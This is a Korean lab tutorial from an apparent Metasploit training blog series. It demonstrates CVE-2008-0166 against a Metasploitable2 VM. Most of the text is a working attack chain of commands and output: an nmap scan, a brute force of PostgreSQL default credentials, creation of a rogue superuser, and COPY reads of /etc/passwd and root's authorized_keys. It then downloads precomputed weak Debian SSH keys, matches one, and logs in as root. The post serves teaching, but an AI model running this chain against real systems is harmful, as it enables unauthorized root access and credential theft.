정보보안(구버전)/Metasploit 2016. 6. 3. 10:54
Metasploit - 07. 취약점 발견 및 공격 (CVE-2008-0166)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
[실습 시스템] Kali Linux, Firewall, Metasploitable2-Linux
- CVE-2008-0166은 Debian OpenSSL 패키지 난수 발생 취약점을 의미한다.
- 암호화 키가 생성될때, 사용하는 임의의 데이터를 추측하기 위한 취약점을 Exploit할 수 있게 된다.
- 만약, Exploit이 가능하다면 암호화 키를 손상시켜 민감한 데이터 접근 할 수 있게 된다.
- Debian OpenSSL 0.9.8c-4etch3 이전 버전만 해당 사항
- exploit-db 사이트 -> search -> CVE-2008-0166 검색
- https://www.exploit-db.com/exploits/5720/
[실습 단계]
스캔 -> PostgresSQL ID/PASSWORD 공격 -> PostgressSQL 접속 -> 사용자 계정 정보 획득 ->
-> SSH Key 해킹 -> SSH 접속 실시
Ex1) Metasploitable2-Linux 관리자 암화 설정
@ Metasploitable2-Linux
msfadmin@metasploitable:~$ sudo -s
[sudo] password for msfadmin: msfadmin
root@metasploitable:~# passwd
Enter new UNIX password: toor
Retype new UNIX password : toor
passwd : password updated successfully
root@metasploitable:~# exit
logout
msfadmin@metasploitable:~$
Ex2) SSH RSA 관련 파일 다운로드 및 압출 해지
@ Kali Linux
- Exploit DB OpenSSL 검색 실시
root@kali:~# /usr/share/exploitdb/searchsploit openssl
--------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------- ----------------------------------
OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs | ./multiple/dos/146.c
Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c) | ./linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit | ./multiple/dos/4773.pl
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl) | ./multiple/remote/5622.txt
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby) | ./multiple/remote/5632.rb
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python) | ./linux/remote/5720.py
~ 중간 생략 ~
- SSH RSA 정보 및 다운로드 링크 확인 ('5622.txt' 파일)
root@kali:~# cat /usr/share/exploitdb/platforms/multiple/remote/5622.txt
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
2. Extract it to a directory
~ 중간 생략 ~
- SSH RSA 관련 파일 다운로드 실시
root@kali:~# cd /var/tmp
root@kali:/var/tmp#
root@kali:/var/tmp# wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2
--2016-06-03 11:28:57-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2
Resolving github.com (github.com)... 192.30.252.121
Connecting to github.com (github.com)|192.30.252.121|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/5622.tar.bz2 [following]
--2016-06-03 11:28:58-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/5622.tar.bz2
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 103.245.222.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|103.245.222.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 50226987 (48M) [application/octet-stream]
Saving to: ‘5622.tar.bz2’
5622.tar.bz2 100%[===============================>] 47.90M 989KB/s in 33s
2016-06-03 11:29:34 (1.45 MB/s) - ‘5622.tar.bz2’ saved [50226987/50226987]
- SSH RSA 파일 압축 해지 실시
root@kali:/var/tmp# tar xvif 5622.tar.bz2
rsa/
rsa/2048/
rsa/2048/2712a6d5cec99f295a0c468b830a370d-28940.pub
rsa/2048/eaddc9bba9bf3c0832f443706903cd14-28712.pub
~ 중간 생략 ~
root@kali:~#
Ex3) '192.168.20.204' 스캔 실시
- nmap을 이용하여 '192.168.20.204'에 대해서 스캔을 실시한다.
@ Kali Linux
root@kali:~# nmap -sV 192.168.20.204
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-03 12:06 KST
Nmap scan report for 192.168.20.204
Host is up (0.00061s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:34:5A:8A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds
Ex4) PostgreSQL 아이디/패스워드 사전 파일 공격 실시
root@kali:~# msfconsole -q
msf > search postgres_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) >
msf auxiliary(postgres_login) > show options
Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target address range or CIDR identifier
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME postgres no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(postgres_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204
msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(postgres_login) > exploit
[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 192.168.20.204:5432 - LOGIN SUCCESSFUL: postgres:postgres@template1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) >
msf auxiliary(postgres_login) > exit
root@kali:~#
Ex5) PostgresSQL 서버 접속 실시 및 DB 확인
@ Kali Linux
- 'postgres/postgres'를 이용하여 Metasploitable2-Linux PostgresSQL에 접속한다.
root@kali:~# psql -h 192.168.20.204 -U postgres
Password for user postgres: postgres
psql (9.4.3, server 8.3.1)
SSL connection (protocol: TLSv1, cipher: DHE-RSA-AES256-SHA, bits: 256, compression: off)
Type "help" for help.
postgres=#
- PostgreSQL 버전 확인
postgres=# select version();
version
-----------------------------------------------------------------------------------------------
PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
(1 row)
- 사용자 테이블 확인
postgres=# select * from pg_user;
usename | usesysid | usecreatedb | usesuper | usecatupd | passwd | valuntil | useconfig
----------+----------+-------------+----------+-----------+----------+----------+-----------
postgres | 10 | t | t | t | ******** | |
(1 row)
- 'test' 사용자 추가 및 확인
postgres=# create user test with password 'test1234';
CREATE ROLE
postgres=# select * from pg_user;
usename | usesysid | usecreatedb | usesuper | usecatupd | passwd | valuntil | useconfig
----------+-----------+--------------+----------+-----------+----------+----------+-----------
postgres | 10 | t | t | t | ******** | |
test | 16384 | f | f | f | ******** | |
(2 rows)
- 'test' 사용자 권한 상승 및 확인
postgres=# alter user test with superuser;
ALTER ROLE
postgres=# select * from pg_user;
usename | usesysid | usecreatedb | usesuper | usecatupd | passwd | valuntil | useconfig
----------+-----------+--------------+----------+-----------+----------+----------+-----------
postgres | 10 | t | t | t | ******** | |
test | 16384 | f | t | f | ******** | |
(2 rows)
- 모든 스키마 확인 및 데이터베이스 확인
postgres-# \dn
List of schemas
Name | Owner
--------+----------
public | postgres
(1 row)
postgres-# \l
List of databases
Name | Owner | Encoding | Access privileges
-----------+----------+----------+-----------------------
postgres | postgres | UTF8 |
template0 | postgres | UTF8 | =c/postgres +
| | | postgres=CTc/postgres
template1 | postgres | UTF8 | =c/postgres +
| | | postgres=CTc/postgres
(3 rows)
- accounts 테이블 생성 및 '/etc/passwd' 내용 복사
postgres=# create table accounts (linux_users text);
CREATE TABLE
postgres=# copy accounts from '/etc/passwd';
COPY 37
- accounts 테이블 내용에 'bash' 글자가 들어간 내용 확인
postgres=# select * from accounts where linux_users like '%bash%';
linux_users
------------------------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
(5 rows)
- sshkeys 테이블 생성 및 '/root/.ssh/authorized_keys' 내용 복사
postgres=# create table sshkeys (auth_key text);
CREATE TABLE
postgres=# copy sshkeys from '/root/.ssh/authorized_keys';
COPY 1
- sshkeys 테이블 내용에 'ssh-rsa' 글자가 들어간 내용 확인
postgres=# select * from sshkeys where auth_key like '%ssh-rsa%';
|
auth_key (END)
q |
- PostgresSQL 접속 종료
postgres=# \q
root@kali:~#
Ex6) SSH RSA 키를 획득하기 위한 PostgresSQL 서버 재접속
- sshkeys 테이블 접속 및 SSH Key 저장 실시
root@kali:~# psql -h 192.168.20.204 -U postgres -c 'select * from sshkeys limit 1' | tee sshkeys.txt
Password for user postgres: postgres
auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)
- 'sshkeys.txt' 파일 확인
root@kali:~# ls -l sshkeys.txt
-rw-r--r-- 1 root root 1229 6월 3 12:42 sshkeys.txt
root@kali:~# cat sshkeys.txt
auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)
- 'sshkeys.txt' 내용 중 'ssh-rsa' 글자를 검색하여 2번째 필드까지 확인
root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}'
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w==
- '==' 부분만 빼고 다시 확인
root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w
- '/var/tmp/rsa/2048/8.pub' 파일 내용중 'sshkeys.txt' 파일과 동일한 내용을 검색하여 'keys.txt'로 저장 실시
root@kali:~# fgrep `grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'` /var/tmp/rsa/2048/*.pub | tee keys.txt
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG
70lShHQqldJkcteZZdPFSbW76IUiPR0OWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO
ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JX
ln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQ
PE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5
cCs4WocyVxsXovcNnbALTp3w== root@targetcluster
root@kali:~# ls keys.txt
keys.txt
root@kali:~# cat keys.txt
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG
70lShHQqldJkcteZZdPFSbW76IUiPR0OWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO
ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JX
ln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQ
PE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5
cCs4WocyVxsXovcNnbALTp3w== root@targetcluster
- '/var/tmp/rsa/2048' 디렉토리 파일 중 'keys.txt' 내용이 들어가 있는 파일 이름과 필터링 실시
root@kali:~# cat keys.txt | awk -F: '{print $1}'
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub
- 파일 이름 중 '.pub'을 필터링하여 확인 실시
root@kali:~# cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429
- Metasploitable2-Linux으로 SSH 접속 실시
root@kali:~# ssh -i `cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'` root@192.168.20.204
The authenticity of host '192.168.20.204 (192.168.20.204)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.20.204' (RSA) to the list of known hosts.
Last login: Thu Jun 2 04:00:18 2016 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
root@metasploitable:~# exit
logout
Connection to 192.168.20.204 closed.
root@kali:~#
[참고] 'bash: /bin/fgrep: 인수 명단이 너무 김' 오류 메세지가 나오면, rsa/2048 디렉토리로 이동하여 'xargs' 명령어 사용
- '5622.tar.bz2' 파일을 root home 디렉토리에 압축해지 한 경우
root@kali:~# cd /root/rsa/2048
root@kali:~/rsa/2048#
root@kali:~/rsa/2048# ls *.pub | xargs fgrep `grep "ssh-rsa" /root/sshkeys.txt | awk '{print $2}' | sed 's/==$//'` | tee /root/keys.txt
root@kali:~/rsa/2048# cat /root/keys.txt
57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== root@targetcluster
root@kali:~/rsa/2048# cat /root/keys.txt | awk -F: '{print $1}'
57c3115d77c56390332dc5c49978627a-5429.pub
root@kali:~/rsa/2048# cat /root/keys.txt | awk -F: '{print $1}' | sed 's/.pub//'
57c3115d77c56390332dc5c49978627a-5429
root@kali:~/rsa/2048# ssh -i `cat /root/keys.txt | awk -F: '{print $1}' | sed 's/.pub//'` root@192.168.20.204
The authenticity of host '192.168.20.204 (192.168.20.204)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.20.204' (RSA) to the list of known hosts.
Last login: Sun Feb 25 21:56:50 2018 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#
root@metasploitable:~# exit
logout
Connection to 192.168.20.204 closed.
root@kali:~/rsa/2048#
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
Metasploit - 제1장 메타스플로잇 (metaspliot)
'정보보안(구버전) > Metasploit' 카테고리의 다른 글
| Metasploit - 09. 취약점 발견 및 공격 (Reverse TCP 공격) (1) | 2016.06.03 |
|---|---|
| Metasploit - 08. 취약점 발견 및 공격 (Tomcat 취약점) (0) | 2016.06.03 |
| Metasploit - 06. 취약점 발견 및 공격 (tikiwiki 취약점 공격) (0) | 2016.06.02 |
| Metasploit - 05. 취약점 발견 및 공격 (MySQL 원격 로그인 시도) (0) | 2016.06.02 |
| Metasploit - 04. 공격 타겟 스캐닝 (0) | 2016.06.02 |
